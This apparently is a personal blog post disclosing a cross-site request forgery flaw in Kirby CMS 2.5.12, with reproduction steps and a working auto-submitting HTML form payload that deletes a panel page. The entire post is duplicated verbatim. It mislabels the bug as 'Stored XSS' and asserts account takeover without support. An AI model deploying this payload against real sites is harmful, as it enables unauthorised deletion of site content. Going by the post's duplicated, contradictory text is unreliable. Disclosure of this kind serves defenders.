Cross Site Request Forgery - Kirby CMS
By- Zaran Shaikh
Hi Readers,
Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.
Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Cross Site Request Forgery.
Title of the Vulnerability: Stored XSS
Vulnerability Class: Web Application Exploits.
Technical Details & Description: The application allows malicious HTTP requests to be sent in order to trick a user into adding/ deleting web pages.
CVE ID allocated: - Undisclosed.
Product & Service Introduction: Kirby CMS
Steps to Re-Produce –
1. Visit the application
2. Go to add page option
3. Create a crafted HTTP page with delete/ add option and host it on a server. Upon sending the link to a user and upon click, it gets triggered and the page is added/deleted
4. Payload:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
<input type="hidden" name="_redirect" value="site/subpages" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Exploitation Technique: A attacker can inject perform severe actions including account takeover.
Severity Level: High
Security Risk:
The presence of such a risk can lead to data loss,privilege escalation etc.
Affected Product Version: Kirby 2.5.12
Solution - Fix & Patch: The application code should be configured to implement anti csrf tokens.
POCs:
By- Zaran Shaikh
Hi Readers,
Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.
Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Cross Site Request Forgery.
Title of the Vulnerability: Stored XSS
Vulnerability Class: Web Application Exploits.
Technical Details & Description: The application allows malicious HTTP requests to be sent in order to trick a user into adding/ deleting web pages.
CVE ID allocated: - Undisclosed.
Product & Service Introduction: Kirby CMS
Steps to Re-Produce –
1. Visit the application
2. Go to add page option
3. Create a crafted HTTP page with delete/ add option and host it on a server. Upon sending the link to a user and upon click, it gets triggered and the page is added/deleted
4. Payload:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
<input type="hidden" name="_redirect" value="site/subpages" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Exploitation Technique: A attacker can inject perform severe actions including account takeover.
Severity Level: High
Security Risk:
The presence of such a risk can lead to data loss,privilege escalation etc.
Affected Product Version: Kirby 2.5.12
Solution - Fix & Patch: The application code should be configured to implement anti csrf tokens.
POCs:
